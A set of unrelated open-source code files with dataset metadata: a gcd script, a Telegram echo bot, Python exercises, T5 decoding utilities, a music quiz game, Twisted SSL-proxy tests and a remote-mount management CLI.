18443624369 | def gcd(x, y):
if(y > x):
tmp = y
y = x
x = tmp
while(int(x%y)>0):
r = x%y
x = y
y = r
return y
# Read n and the n integers, then compute the minimum gcd over all
# adjacent pairs a[i], a[i+1].
n = int(input())  # number of elements
a = list(map(int, input().split()))
# NOTE(review): assumes n >= 2 and len(a) >= n; no validation is done.
ans = gcd(a[0], a[1])
for i in range(1, n-1):
    ans = min(ans, gcd(a[i], a[i+1]))
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03127/s136528534.py | s136528534.py | py | 318 | python | en | code | 0 | github-code | 90 |
25323810315 | import logging
from telegram import Update
from telegram.ext import ApplicationBuilder, ContextTypes, filters, MessageHandler, CommandHandler
import settings
logging.basicConfig(filename='bot.log', level=logging.INFO)
async def echo(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """Echo the incoming message text back to the chat it came from."""
    chat_id = update.effective_chat.id
    incoming_text = update.message.text
    await context.bot.send_message(chat_id=chat_id, text=incoming_text)
async def start(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """Handle the /start command: log to stdout, then greet the user."""
    print('Вызван /start')
    greeting = 'Привет, пользователь! Ты вызвал команду /start'
    await update.message.reply_text(greeting)
def main():
    """Build the Telegram application, register handlers and start polling."""
    app = ApplicationBuilder().token(settings.API_KEY).build()
    # Plain text messages (everything that is not a command) are echoed back.
    app.add_handler(MessageHandler(filters.TEXT & (~filters.COMMAND), echo))
    # /start gets its own command handler.
    app.add_handler(CommandHandler("start", start))
    logging.info("Bot started")
    app.run_polling()
if __name__ == "__main__":
main() | anatalin/learn-python-ru-example | mybot/bot.py | bot.py | py | 1,028 | python | en | code | 0 | github-code | 90 |
34727122417 | #!/usr/bin/python3
def safe_print_division(a, b):
    """Divide two integers; print the result and return None if undefined."""
    try:
        result = a / b
    except ZeroDivisionError:
        result = None
    finally:
        # Runs on both the success and the division-by-zero path.
        print("Inside result: {}".format(result))
    return result
| keysmusician/holbertonschool-higher_level_programming | 0x05-python-exceptions/3-safe_print_division.py | 3-safe_print_division.py | py | 282 | python | en | code | 0 | github-code | 90 |
16623239417 | import gin
import numpy as np
import tensorflow as tf
def get_inputs_from_file(input_filename, ignore_comments=False):
  """Read lines from a file, stripping trailing whitespace/newlines.

  Args:
    input_filename: a string, path readable via tf.io.gfile.
    ignore_comments: a boolean; if True, drop lines starting with "#".

  Returns:
    a list of strings, one per line (a trailing empty line is removed).
  """
  inputs = [line.rstrip() for line in tf.io.gfile.GFile(input_filename)]
  # Strip the last empty line. Guarded so a completely empty file no longer
  # raises IndexError on inputs[-1].
  if inputs and not inputs[-1]:
    inputs.pop()
  if ignore_comments:
    inputs = [l for l in inputs if not l.startswith("#")]
  return inputs
def inputs_vocabulary(vocabulary):
  """Get the inputs vocabulary.

  Args:
    vocabulary: Vocabulary or (inputs_vocabulary, targets_vocabulary) tuple.

  Returns:
    a Vocabulary
  """
  # A tuple means (inputs, targets); anything else is already the vocabulary.
  return vocabulary[0] if isinstance(vocabulary, tuple) else vocabulary
def encode_inputs(inputs,
                  vocabulary,
                  model_type,
                  batch_size,
                  sequence_length,
                  eos_id=1,
                  unscored_prefix=None):
  """Encode string inputs for inference/scoring.

  Args:
    inputs: list of strings
    vocabulary: a mtf.transformer.vocabulary.Vocabulary
    model_type: a string; "lm" inputs are a partial sequence to be continued
      and are not EOS-terminated, every other model type gets an EOS.
    batch_size: an integer; the output is padded (by repeating the first
      example) to a multiple of this.
    sequence_length: an integer (maximum decode length)
    eos_id: EOS id
    unscored_prefix: an optional list of strings; its tokens are encoded
      with negated ids so they can be excluded from scoring.

  Returns:
    all_input_ids: an int32 numpy array of shape
      [ceil(len(inputs) / batch_size) * batch_size, sequence_length]
  """
  # Hoisted out of the loop: the original resolved the vocabulary per line.
  vocab = inputs_vocabulary(vocabulary)
  n = len(inputs)
  all_input_ids = []
  for line_num, line in enumerate(inputs):
    ids = vocab.encode(line.strip())
    if unscored_prefix:
      prefix_str = unscored_prefix[line_num].strip()
      # Negative ids mark prefix tokens that should not be scored.
      ids = [-i for i in vocab.encode(prefix_str)] + ids
    if model_type != "lm":
      # for text2self problems, the inputs represent a partial sequence
      # to be continued, and should not be terminated by EOS.
      # for sequence-to-sequence problems, the input needs to be
      # EOS-terminated
      ids += [eos_id]
    # Truncate or zero-pad to exactly sequence_length.
    if len(ids) > sequence_length:
      ids = ids[:sequence_length]
    else:
      ids.extend([0] * (sequence_length - len(ids)))
    all_input_ids.append(ids)
  # pad to make an integral number of batches by repeating the first example
  # (guarded so an empty input list no longer raises IndexError)
  if n % batch_size:
    all_input_ids.extend([all_input_ids[0]] * (-n % batch_size))
  return np.array(all_input_ids, dtype=np.int32)
def decode_from_file(estimator,
                     vocabulary,
                     model_type,
                     batch_size,
                     sequence_length,
                     checkpoint_path=None,
                     input_filename=gin.REQUIRED,
                     output_filename=gin.REQUIRED,
                     eos_id=1,
                     repeats=1):
  """Decode from a text file and write to output_filename.

  Args:
    estimator: a TPUEstimator
    vocabulary: a mtf.transformer.vocabulary.Vocabulary
    model_type: a string
    batch_size: an integer
    sequence_length: a dict from feature-key to integer, the (packed)
      sequence length, e.g. {"inputs": 512, "targets": 128}. Note the body
      indexes sequence_length["inputs"], so a plain integer would fail here.
    checkpoint_path: an optional string
    input_filename: a string
    output_filename: a string; "-<checkpoint step>" is appended to it.
    eos_id: EOS id
    repeats: an integer, the number of times to repeat each input.
  """
  inputs = get_inputs_from_file(input_filename)
  all_input_ids = encode_inputs(inputs, vocabulary, model_type, batch_size,
                                sequence_length["inputs"], eos_id=eos_id)
  def input_fn(params):
    # Closure over all_input_ids; each example is duplicated `repeats`
    # times consecutively before batching.
    del params
    dataset = tf.data.Dataset.from_tensor_slices({"inputs": all_input_ids})
    dataset = dataset.flat_map(
        lambda x: tf.data.Dataset.from_tensors(x).repeat(repeats))
    dataset = dataset.batch(batch_size, drop_remainder=True)
    dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
    return dataset
  # get_step_from_checkpoint_path, decode and write_lines_to_file are
  # presumably module-level helpers defined elsewhere in this file.
  checkpoint_step = get_step_from_checkpoint_path(checkpoint_path)
  decodes = decode(
      estimator, input_fn, vocabulary, checkpoint_path=checkpoint_path)
  # Remove any padded examples (encode_inputs repeats the first example to
  # fill the last batch).
  dataset_size = len(inputs) * repeats
  decodes = decodes[:dataset_size]
  output_filename = "{}-{}".format(output_filename, checkpoint_step)
  write_lines_to_file(decodes, output_filename)
| disi-unibo-nlp/bio-ee-egv | src/utils/t5x_utils/test_utils.py | test_utils.py | py | 4,029 | python | en | code | 11 | github-code | 90 |
22910490334 | import random
import os
import pygame
import tkinter as tk
from tkinter.filedialog import askdirectory
# Initialize the music mixer once, up front.
pygame.mixer.init()
# Tkinter's askdirectory opens its own root window; withdraw() keeps it hidden.
root = tk.Tk()
root.withdraw()
# Start the game with a clean terminal.
os.system("clear")
directory = askdirectory()
os.chdir(directory)
list_dir = os.listdir(directory)
list_dir.sort()
print(f"\n{directory}\n")
# Keep only the playable .mp3 tracks from the chosen directory.
list_of_songs = []
for files in list_dir:
    if files.endswith(".mp3"):
        list_of_songs.append(files)
score = 0
playing = True
while playing:
    # Offer three distinct candidate tracks and secretly pick one to play.
    three_rand_songs = random.sample(range(len(list_of_songs)), 3)
    rando = random.randint(0, 2)
    track_num = three_rand_songs[rando]
    for choice, song_index in enumerate(three_rand_songs, start=1):
        print(f"\n{choice}) --- {list_of_songs[song_index]}\n")
    pygame.mixer.music.stop()
    pygame.mixer.music.load(list_of_songs[track_num])
    pygame.mixer.music.play()
    answer = input("\nWhich song is playing? 1, 2, or 3? \n\nPress q to quit \n\n")
    # BUG FIX: the original converted the answer with int() *before* checking
    # for "q", so quitting crashed with ValueError and the loop never ended
    # (another_track was never updated).
    if answer.strip().lower() == "q":
        playing = False
        continue
    if answer.strip() not in ("1", "2", "3"):
        # Non-numeric input used to crash the game; re-ask instead.
        print("\nPlease answer 1, 2, 3 or press q to quit\n")
        continue
    which_song = int(answer) - 1
    if which_song == rando:
        print("\n..............................\n")
        print("\nCORRECT!\n")
        score += 1
        print(f"The score is\n\n{score}\n")
        print("\n..............................\n")
    else:
        print("\n..............................\n")
        print("\nsorry that is not it\n")
        print(f"The score is\n\n{score}\n")
        print("\n..............................\n")
print("\n..............................\n")
print(f"Thanks for playing the final score was {score}")
print("\n..............................\n") | adam-goodrich/Python_Practice | music_gamr.py | music_gamr.py | py | 1,991 | python | en | code | 0 | github-code | 90 |
38468256059 | import logging
import re
import unittest
from StringIO import StringIO
import OpenSSL
import twisted
from mocker import Mocker, expect
from twisted.internet import defer, reactor, error as txerror, ssl
from twisted.python import failure
from twisted.web import client, error as web_error
from twisted.trial.unittest import TestCase
from config import config
from ubuntuone.devtools.handlers import MementoHandler
from metrics.metricsconnector import MetricsConnector
from ubuntuone.storage.server.testing.testcase import TestWithDatabase
from ubuntuone.storage.server import ssl_proxy
from ubuntuone.storage.server.server import PREFERRED_CAP
from ubuntuone.storageprotocol.client import (
StorageClientFactory, StorageClient)
from ubuntuone.supervisor import utils as supervisor_utils
class SSLProxyServiceTest(TestWithDatabase):
    """Tests for the service instance."""
    # Pushed into config in setUp; 0 disables the heartbeat for these tests.
    ssl_proxy_heartbeat_interval = 0
    @defer.inlineCallbacks
    def setUp(self):
        yield super(SSLProxyServiceTest, self).setUp()
        self.configure_logging()
        # Save the configured interval so tearDown can restore it.
        self._old_heartbeat_interval = config.ssl_proxy.heartbeat_interval
        # Route all metrics into an in-memory receiver for inspection.
        self.metrics = MetricReceiver()
        namespace = config.ssl_proxy.metrics_namespace
        instance = MetricsConnector.new_txmetrics(connection=self.metrics,
                                                  namespace=namespace)
        MetricsConnector.register_metrics("ssl-proxy", namespace, instance)
        config.ssl_proxy.heartbeat_interval = self.ssl_proxy_heartbeat_interval
    def configure_logging(self):
        """Configure logging for the tests (capture via MementoHandler)."""
        logger = logging.getLogger("ssl_proxy")
        logger.setLevel(logging.DEBUG)
        logger.propagate = False
        self.handler = MementoHandler()
        logger.addHandler(self.handler)
        self.addCleanup(logger.removeHandler, self.handler)
    @defer.inlineCallbacks
    def tearDown(self):
        # Restore the heartbeat interval changed in setUp.
        config.ssl_proxy.heartbeat_interval = self._old_heartbeat_interval
        yield super(SSLProxyServiceTest, self).tearDown()
        MetricsConnector.unregister_metrics()
    @defer.inlineCallbacks
    def test_start_stop(self):
        """Test for start/stopService."""
        ssl_service = ssl_proxy.ProxyService(
            self.ssl_cert, self.ssl_key, self.ssl_cert_chain, 0, # port
            "localhost", self.port, "ssl-proxy-test", 0)
        # mimic what twistd will call when running the .tac file
        yield ssl_service.privilegedStartService()
        yield ssl_service.stopService()
class SSLProxyTestCase(TestWithDatabase):
    """Base test case that starts a real ssl proxy in front of the server."""
    # Pushed into config in setUp; 0 disables the heartbeat (subclasses
    # override this to enable it).
    ssl_proxy_heartbeat_interval = 0
    @defer.inlineCallbacks
    def setUp(self):
        yield super(SSLProxyTestCase, self).setUp()
        self.configure_logging()
        self.ssl_service = ssl_proxy.ProxyService(self.ssl_cert,
                                                  self.ssl_key,
                                                  self.ssl_cert_chain,
                                                  0, # port
                                                  "localhost", self.port,
                                                  "ssl-proxy-test", 0)
        # keep metrics in our MetricReceiver
        self.metrics = MetricReceiver()
        namespace = config.ssl_proxy.metrics_namespace
        instance = MetricsConnector.new_txmetrics(connection=self.metrics,
                                                  namespace=namespace)
        MetricsConnector.register_metrics("ssl-proxy", namespace, instance)
        self._old_heartbeat_interval = config.ssl_proxy.heartbeat_interval
        config.ssl_proxy.heartbeat_interval = self.ssl_proxy_heartbeat_interval
        yield self.ssl_service.startService()
    def configure_logging(self):
        """Configure logging for the tests (capture via MementoHandler)."""
        logger = logging.getLogger("ssl_proxy")
        logger.setLevel(logging.DEBUG)
        logger.propagate = False
        self.handler = MementoHandler()
        logger.addHandler(self.handler)
        self.addCleanup(logger.removeHandler, self.handler)
    @defer.inlineCallbacks
    def tearDown(self):
        # Restore the heartbeat interval changed in setUp.
        config.ssl_proxy.heartbeat_interval = self._old_heartbeat_interval
        yield super(SSLProxyTestCase, self).tearDown()
        yield self.ssl_service.stopService()
        MetricsConnector.unregister_metrics()
    @property
    def ssl_port(self):
        """SSL port the running proxy service is listening on."""
        return self.ssl_service.port
class BasicSSLProxyTestCase(SSLProxyTestCase):
    """Basic tests for the ssl proxy service."""
    def test_server(self):
        """Stop and restart the server."""
        d = self.ssl_service.stopService()
        d.addCallback(lambda _: self.ssl_service.startService())
        return d
    def test_connect(self):
        """Create a simple client that just connects."""
        def dummy(client):
            client.test_done("ok")
        return self.callback_test(dummy, use_ssl=True)
    def test_both_ways(self):
        """Test that communication works both ways."""
        @defer.inlineCallbacks
        def auth(client):
            yield client.protocol_version()
        return self.callback_test(auth, add_default_callbacks=True,
                                  use_ssl=True)
    @unittest.skip('Should fail with connectionDone')
    @defer.inlineCallbacks
    def test_ssl_handshake_backend_dead(self):
        """No ssl handshake failure if the backend is dead."""
        # turn off the backend
        yield self.service.stopService()
        self.addCleanup(self.service.startService)
        # patch connectionMade to get a reference to the client.
        client_d = defer.Deferred()
        orig_connectionMade = StorageClient.connectionMade
        def connectionMade(s):
            """Intercept connectionMade and publish the client."""
            orig_connectionMade(s)
            client_d.callback(s)
        self.patch(StorageClient, 'connectionMade', connectionMade)
        f = StorageClientFactory()
        # connect to the server
        reactor.connectSSL(
            "localhost", self.ssl_port, f, ssl.ClientContextFactory())
        storage_client = yield client_d
        # try to do anything; it should fail with ConnectionDone, not with
        # an OpenSSL handshake error
        try:
            yield storage_client.set_caps(PREFERRED_CAP)
        except txerror.ConnectionDone:
            pass
        except OpenSSL.SSL.Error as e:
            self.fail("Got %s" % e)
        else:
            self.fail("Should get a ConnectionDone.")
    def test_producers_registered(self):
        """Test that both producers are registered."""
        orig = self.ssl_service.factory.buildProtocol
        called = []
        def catcher(*a, **kw):
            """Collect calls to buildProtocol."""
            p = orig(*a, **kw)
            called.append(p)
            return p
        self.patch(self.ssl_service.factory, 'buildProtocol', catcher)
        @defer.inlineCallbacks
        def auth(client):
            yield client.protocol_version()
            proto = called[0]
            # check that the producers match
            # backend transport is the frontend producer
            self.assertIdentical(
                proto.peer.transport, proto.transport.producer)
            # frontend transport is the backend producer
            self.assertIdentical(
                proto.transport, proto.peer.transport.producer)
        return self.callback_test(auth, add_default_callbacks=True,
                                  use_ssl=True)
    # Class-body conditional: skip the producer test on modern twisted.
    if twisted.version.major >= 11:
        test_producers_registered.skip = "already fixed in twisted >= 11"
    @defer.inlineCallbacks
    def test_server_status_ok(self):
        """Check that the server status page reports OK."""
        page = yield client.getPage("http://localhost:%i/status" %
                                    self.ssl_service.status_port)
        self.assertEqual("OK", page)
    @defer.inlineCallbacks
    def test_server_status_fail(self):
        """Check that the status page returns 503 when the backend is down."""
        # shutdown the tcp port of the storage server.
        self.service.tcp_service.stopService()
        d = client.getPage("http://localhost:%i/status" %
                           (self.ssl_service.status_port,))
        e = yield self.assertFailure(d, web_error.Error)
        self.assertEqual("503", e.status)
        self.assertEqual("Service Unavailable", e.message)
        self.assertIn('Connection was refused by other side: 111', e.response)
    def test_heartbeat_disabled(self):
        """Test that the heartbeat is disabled (interval is 0 here)."""
        self.assertFalse(self.ssl_service.heartbeat_writer)
class SSLProxyHeartbeatTestCase(SSLProxyTestCase):
    """Tests for ssl proxy server heartbeat."""
    # Non-zero interval so the heartbeat writer is actually started.
    ssl_proxy_heartbeat_interval = 0.1
    @defer.inlineCallbacks
    def setUp(self):
        # Redirect the supervisor heartbeat into an in-memory buffer
        # before the base setUp starts the service.
        self.stdout = StringIO()
        send_heartbeat = supervisor_utils.send_heartbeat
        self.patch(supervisor_utils, 'send_heartbeat',
                   lambda *a, **kw: send_heartbeat(out=self.stdout))
        yield super(SSLProxyHeartbeatTestCase, self).setUp()
    @defer.inlineCallbacks
    def test_heartbeat_stdout(self):
        """Test that the heartbeat is working."""
        # Wait 0.2s (two intervals) so at least one heartbeat is emitted.
        d = defer.Deferred()
        reactor.callLater(0.2, d.callback, None)
        yield d
        self.assertIn('<!--XSUPERVISOR:BEGIN-->', self.stdout.buflist)
        self.assertIn('<!--XSUPERVISOR:END-->', self.stdout.buflist)
class ProxyServerTest(TestCase):
    """Unit tests for the ProxyServer class (mocked transports, no network)."""
    @defer.inlineCallbacks
    def setUp(self):
        yield super(ProxyServerTest, self).setUp()
        self.server = ssl_proxy.ProxyServer()
        # setup a client too
        self.peer = ssl_proxy.ProxyClient()
        self.peer.setPeer(self.server)
    @defer.inlineCallbacks
    def tearDown(self):
        self.server = None
        yield super(ProxyServerTest, self).tearDown()
        MetricsConnector.unregister_metrics()
    def test_connectionMade(self):
        """Test connectionMade with handshake done."""
        mocker = Mocker()
        metrics = self.server.metrics = mocker.mock()
        transport = self.server.transport = mocker.mock()
        self.server.factory = ssl_proxy.SSLProxyFactory(0, 'host', 0)
        # Intercept the outgoing backend connection instead of dialing.
        called = []
        self.patch(reactor, 'connectTCP',
                   lambda *a: called.append('connectTCP'))
        # Expectations: meter the event, log the peer, and pause producing
        # until the backend connection is up.
        expect(metrics.meter('frontend_connection_made', 1))
        expect(transport.getPeer()).result("host:port info").count(1)
        expect(transport.pauseProducing())
        with mocker:
            self.server.connectionMade()
        self.assertEqual(called, ['connectTCP'])
    def test_connectionLost(self):
        """Test connectionLost method."""
        mocker = Mocker()
        metrics = self.server.metrics = mocker.mock()
        transport = self.server.transport = mocker.mock()
        self.server.peer = self.peer
        peer_transport = self.peer.transport = mocker.mock()
        # Expectations: meter the event, log the peer, and drop the
        # backend-side connection as well.
        expect(metrics.meter('frontend_connection_lost', 1))
        expect(transport.getPeer()).result("host:port info").count(1)
        expect(peer_transport.loseConnection())
        with mocker:
            self.server.connectionLost()
class MetricReceiver(object):
    """A receiver for metrics.

    Records every written metric message so tests can check, via the
    ``in`` operator, whether a message matching a regex was received.
    """
    def __init__(self):
        """Initialize the received message list."""
        self.received = []
    def __contains__(self, pattern):
        """Return True if any received message matches regex *pattern*."""
        regex = re.compile(pattern)
        # re.search is cheaper than findall and, unlike
        # any(regex.findall(...)), is also correct for zero-width matches
        # (any([""]) is False).
        return any(regex.search(message) for message in self.received)
    def connect(self, transport=None):
        """Not implemented (metrics API compatibility stub)."""
        pass
    def disconnect(self):
        """Not implemented (metrics API compatibility stub)."""
        pass
    def write(self, message):
        """Store the received message."""
        self.received.append(message)
class SSLProxyMetricsTestCase(SSLProxyTestCase):
    """Tests for ssl proxy metrics using real connections."""
    @defer.inlineCallbacks
    def setUp(self):
        yield super(SSLProxyMetricsTestCase, self).setUp()
        # keep the protocols created in a list
        self.protocols = []
        buildProtocol = self.ssl_service.factory.buildProtocol
        def build_protocol(*a, **kw):
            """Keep a reference to the just created protocol instance."""
            p = buildProtocol(*a, **kw)
            self.protocols.append(p)
            return p
        self.patch(self.ssl_service.factory, 'buildProtocol', build_protocol)
    @defer.inlineCallbacks
    def test_start_stop(self):
        """Start/stop metrics."""
        self.assertIn('server_start', self.metrics)
        yield self.ssl_service.stopService()
        self.assertIn('server_stop', self.metrics)
    @defer.inlineCallbacks
    def test_frontend_connection_made(self):
        """Frontend connectionMade metrics."""
        def dummy(client):
            client.test_done('ok')
        yield self.callback_test(dummy, use_ssl=True)
        self.assertIn('frontend_connection_made', self.metrics)
        self.assertTrue(self.handler.check_debug('Frontend connection made'))
    @defer.inlineCallbacks
    def test_frontend_connection_lost(self):
        """Frontend connectionLost metrics."""
        # d fires once the patched connectionLost has run.
        d = defer.Deferred()
        def dummy(client):
            # patch ProxyServer.connectionLost
            orig_connectionLost = self.protocols[0].connectionLost
            def connectionLost(reason):
                """Catch disconnect and force a ConnectionLost."""
                orig_connectionLost(txerror.ConnectionLost())
                d.callback(None)
            self.patch(self.protocols[0], 'connectionLost', connectionLost)
            client.kill() # kill the client and trigger a connection lost
            client.test_done('ok')
        yield self.callback_test(dummy, use_ssl=True)
        yield d
        self.assertIn('frontend_connection_lost', self.metrics)
        self.assertTrue(self.handler.check_debug('Frontend connection lost'))
    @defer.inlineCallbacks
    def test_backend_connection_made(self):
        """Backend connectionMade metrics."""
        def dummy(client):
            client.test_done('ok')
        yield self.callback_test(dummy, use_ssl=True)
        self.assertIn('backend_connection_made', self.metrics)
        self.assertTrue(self.handler.check_debug('Backend connection made'))
    @defer.inlineCallbacks
    def test_backend_connection_lost(self):
        """Backend connectionLost metrics."""
        # d fires once the patched connectionLost has run.
        d = defer.Deferred()
        def dummy(client):
            orig_connectionLost = self.protocols[0].peer.connectionLost
            def connectionLost(reason):
                """Catch disconnect and force a ConnectionLost."""
                orig_connectionLost(failure.Failure(txerror.ConnectionLost()))
                d.callback(None)
            self.patch(
                self.protocols[0].peer, 'connectionLost', connectionLost)
            # shut down the backend side to trigger the disconnect
            self.service.factory.protocols[0].shutdown()
            client.test_done('ok')
        yield self.callback_test(dummy, use_ssl=True)
        yield d
        self.assertIn('backend_connection_lost', self.metrics)
        self.assertTrue(self.handler.check_debug('Backend connection lost'))
    @defer.inlineCallbacks
    def test_backend_connection_done(self):
        """Backend connectionDone metrics."""
        # d fires once the patched connectionLost has run.
        d = defer.Deferred()
        def dummy(client):
            orig_connectionLost = self.protocols[0].peer.connectionLost
            def connectionLost(reason):
                """Catch disconnect and force a ConnectionDone."""
                orig_connectionLost(failure.Failure(txerror.ConnectionDone()))
                d.callback(None)
            self.patch(
                self.protocols[0].peer, 'connectionLost', connectionLost)
            # shut down the backend side to trigger the disconnect
            self.service.factory.protocols[0].shutdown()
            client.test_done('ok')
        yield self.callback_test(dummy, use_ssl=True)
        yield d
        self.assertIn('backend_connection_done', self.metrics)
        self.assertTrue(self.handler.check_debug('Backend connection done'))
| stevegood/filesync-server | src/server/tests/test_ssl_proxy.py | test_ssl_proxy.py | py | 16,149 | python | en | code | 7 | github-code | 90 |
23650027912 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#########################################################
# SCRIPT : xremotemount.py #
# Xnas manage remote mounts #
# #
# I. Helwegen 2020 #
#########################################################
####################### IMPORTS #########################
import sys
from common.xnas_engine import xnas_engine
from common.xnas_check import xnas_check
from remotes.remotemount import remotemount
#########################################################
####################### GLOBALS #########################
# Commands that require a <name> positional argument (enforced by
# xremotemount.nameRequired() below).
NAMELIST = ["add", "del", "mnt", "umnt", "clr", "ena", "dis", "shw"]
# Passed to xnas_check.ErrorExit() in run(); presumably the commands for
# which a failed consistency check is fatal -- TODO confirm in xnas_check.
NAMECHECK = ["del", "clr", "mnt", "dis", "shw"]
#########################################################
###################### FUNCTIONS ########################
#########################################################
# Class : xremotemount #
#########################################################
class xremotemount(xnas_engine):
def __init__(self):
xnas_engine.__init__(self, "xremotemount")
self.settings = {}
def __del__(self):
xnas_engine.__del__(self)
def run(self, argv):
result = True
self.handleArgs(argv)
Remotemount = remotemount(self, self.settings['human'])
xcheck = xnas_check(self, Remotemount = Remotemount, json = self.settings['json'])
if xcheck.ErrorExit(xcheck.check(), self.settings, NAMECHECK):
if self.settings["json"]:
self.printJsonResult(False)
exit(1)
del xcheck
if not self.hasSetting(self.settings,"command"):
remotemounts = Remotemount.getRemotemounts()
if self.settings["json"]:
self.printJson(remotemounts)
else:
self.prettyPrintTable(remotemounts)
elif self.settings["command"] == "add":
self.needSudo()
result = Remotemount.addRm(self.settings["name"])
if result:
self.update()
self.logger.info("Database updated with new remotemount entries")
if self.settings["json"]:
self.printJsonResult(result)
# zfs do not create or destroy, use ZFS for that!
elif self.settings["command"] == "del":
self.needSudo()
result = Remotemount.delRm(self.settings["name"])
if result:
self.update()
self.logger.info("Database updated")
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "pop":
self.needSudo()
doUpdate = True
if 'pop' in self.settings:
if not self.settings['pop']:
doUpdate = False
else:
self.settings['pop'] = []
addedRemotemounts = Remotemount.pop(self.settings['interactive'], self.settings['pop'])
if addedRemotemounts:
if doUpdate:
self.update()
self.logger.info("Database updated with new remotemount entries")
if self.settings["json"]:
self.printJson(addedRemotemounts)
else:
self.prettyPrintTable(addedRemotemounts)
elif self.settings["command"] == "mnt":
self.needSudo()
result = Remotemount.mnt(self.settings["name"])
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "umnt":
self.needSudo()
result = Remotemount.umnt(self.settings["name"])
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "clr":
self.needSudo()
result = Remotemount.clr(self.settings["name"])
if result:
self.update()
self.logger.info("Database updated")
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "ena":
self.needSudo()
#result = Remotemount.ena(self.settings["name"])
self.parseError("Command deprecated, use --method option instead")
result = False
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "dis":
self.needSudo()
#result = Remotemount.dis(self.settings["name"])
self.parseError("Command deprecated, use --method option instead")
result = False
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "shw":
self.needSudo()
remotemountData = Remotemount.shw(self.settings["name"])
if self.settings["json"]:
self.printJson(remotemountData)
else:
self.prettyPrintTable(self.settings2Table(remotemountData))
elif self.settings["command"] == "lst":
entries = Remotemount.inDB()
if self.settings["json"]:
self.printJson(entries)
else:
self.prettyPrintTable(entries)
elif self.settings["command"] == "url":
url = Remotemount.findUrl()
if self.settings["json"]:
self.printJson(url)
else:
self.printValues(url)
else:
self.parseError("Unknown command argument")
result = False
if self.settings["json"]:
self.printJsonResult(result)
exit(0 if result else 1)
def nameRequired(self):
if self.hasSetting(self.settings,"command"):
if self.settings["command"] in NAMELIST and not "name" in self.settings:
self.parseError("The option {} requires a <name> as argument".format(self.settings["command"]))
def handleArgs(self, argv):
xargs = {"add": "adds or edits a remotemount [add <name>]",
"del": "deletes a remotemount [del <name>]",
"pop": "populates from fstab [pop]",
"mnt": "mounts a remotemount [mnt <name>]",
"umnt": "unmounts a remotemount if not referenced [umnt <name>]",
"clr": "removes a remotemount, but leaves fstab [clr <name>]",
"shw": "shows current remotemount settings [shw <name>]",
"lst": "lists xremotemount compatible fstab entries [lst]",
"url": "prints url of a <name> or <server>, <sharename> [url]",
"-": "show remotemounts and their status"}
xopts = {"interactive": "ask before adding or changing mounts",
"human": "show sizes in human readable format",
"https": "davfs use https <boolean> (default = True) (add)",
"server": "server for remote mount <string> (add)",
"sharename": "sharename for remote mount <string> (add)",
"mountpoint": "mountpoint <string> (add)",
"type": "type <string> (davfs, cifs, s2hfs, nfs or nfs4) (add)",
"options": "extra options, besides _netdev <string> (add)",
"rw": "mount rw <boolean> (add)",
"freq": "dump value <value> (add)",
"pass": "mount order <value> (add)",
"uacc": "users access level (,r,w) (default = rw) (add)",
"sacc": "superuser access level (,r,w) (default = rw) (add)",
"username": "remote mount access username (guest if omitted) (add)",
"password": "remote mount access password (add)",
"action": "addkey, addcred, delkey, delcred (s2hfs) (add)",
"method": "mount method <string> (see below) (add)",
"idletimeout": "unmount when idle timeout <int> (default = 30) (add)",
"timeout": "mounting timeout <int> (default = 10) (add)"}
extra = ('URL generation from settings:\n'
'davfs: <https>://<sharename>.<server>, e.g. https://test.myserver.com/dav.php/\n'
's2hfs: <user>@<server>:<sharename> , e.g. test@192.168.1.1:myfolder\n'
'cifs : //<server>/<sharename> , e.g. //192.168.1.1/test\n'
'nfs : server:<sharename> , e.g. 192.168.1.1:/test\n'
'"nfs4" is prefered as type for nfs, "nfs" as type refers to nfs3\n'
'A specific action for s2hfs (sshfs) can be defined:\n'
'addkey : generate and add an ssh key pair for accessing s2hfs\n'
'addcred: add credentials for accessing s2hfs\n'
'delkey : delete an existing key pair\n'
'delcred: delete existing credentials\n'
'At del, keys and credentials will be deleted\n'
'Mount methods:\n'
'disabled: do not mount\n'
'startup : mount from fstab during startup\n'
'auto : auto mount from fstab when accessed (default)\n'
'dynmount: dynamically mount when available\n'
'Options may be entered as single JSON string using full name, e.g.\n'
'xremotemount add test \'{"server": "192.168.1.1", "sharename": "test", \n'
' "mountpoint": "/mnt/test", "type": "cifs", \n'
' "username": "userme", "password": "secret"}\'\n'
'Mind the single quotes to bind the JSON string.')
self.fillSettings(self.parseOpts(argv, xopts, xargs, extra), xopts)
    def fillSettings(self, optsnargs, xopts):
        """Populate self.settings from parsed command-line options and arguments.

        optsnargs: pair (options-dict, positional-arguments-list) as returned
                   by parseOpts.
        xopts:     table of known options; the chosen command is registered in
                   it so optional JSON input for that command is accepted.
        """
        # Positional layout: [command, name-or-JSON, JSON]; anything more is an error.
        if len(optsnargs[1]) > 0:
            self.settings["command"]=optsnargs[1][0]
            xopts[self.settings["command"]] = "NA" # Add command for optional JSON input
        if len(optsnargs[1]) > 1:
            if self.settings["command"] in NAMELIST:
                self.settings["name"]=optsnargs[1][1]
            else:
                # Second argument may be either a JSON settings blob or a plain name.
                if self.isJSON(optsnargs[1][1]):
                    self.settings.update(self.parseJSON(optsnargs[1][1], xopts))
                else:
                    self.settings["name"]=optsnargs[1][1]
        if len(optsnargs[1]) > 2:
            self.settings.update(self.parseJSON(optsnargs[1][2], xopts))
        if len(optsnargs[1]) > 3:
            self.parseError("Too many arguments")
        # Explicit command-line options override anything set above.
        self.settings.update(optsnargs[0])
        # Normalize option value types; the False argument presumably marks the
        # key as optional — TODO confirm against settingsBool/Int/Str.
        self.settingsBool(self.settings, 'json')
        self.settingsBool(self.settings, 'interactive')
        self.settingsBool(self.settings, 'human')
        #self.settingsBool(self.settings, 'auto', False)
        self.settingsBool(self.settings, 'rw', False)
        self.settingsBool(self.settings, 'https', False)
        self.settingsInt(self.settings, 'freq', False)
        self.settingsInt(self.settings, 'pass', False)
        self.settingsStr(self.settings, 'uacc', False)
        self.settingsStr(self.settings, 'sacc', False)
        self.settingsStr(self.settings, 'username', False)
